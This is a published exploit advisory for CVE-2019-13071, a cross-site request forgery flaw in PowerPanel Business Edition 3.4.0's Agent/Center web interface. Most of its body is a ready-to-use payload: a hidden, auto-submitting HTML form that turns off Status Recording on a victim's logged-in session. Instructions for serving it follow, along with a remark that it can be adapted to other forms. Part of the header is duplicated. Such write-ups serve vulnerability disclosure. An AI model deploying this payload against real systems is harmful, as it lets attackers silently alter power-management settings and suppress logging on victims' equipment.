PowerPanel Business Edition 3.4.0 Cross Site Request Forgery

# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page. Create a file named 'csrf.html' on a local workstation
with the following contents:

<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
<input type='hidden' name='value(recordingEnable)' value='no'>
<input type='hidden' name='value(recordingInterval)' value='10'>
<input type='hidden' name='value(periodToRemoveRecord)' value='2'>
<input type='hidden' name='value(clearAllStatusLogs)' value='no'>
<input type='hidden' name='value(type)' value='records'>
<input type='hidden' name='value(action)' value='Apply'>
<input type='hidden' name='value(button)' value='Apply'>
<input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording. This could be adapted to exploit other forms in the web
application as well.


Leave a comment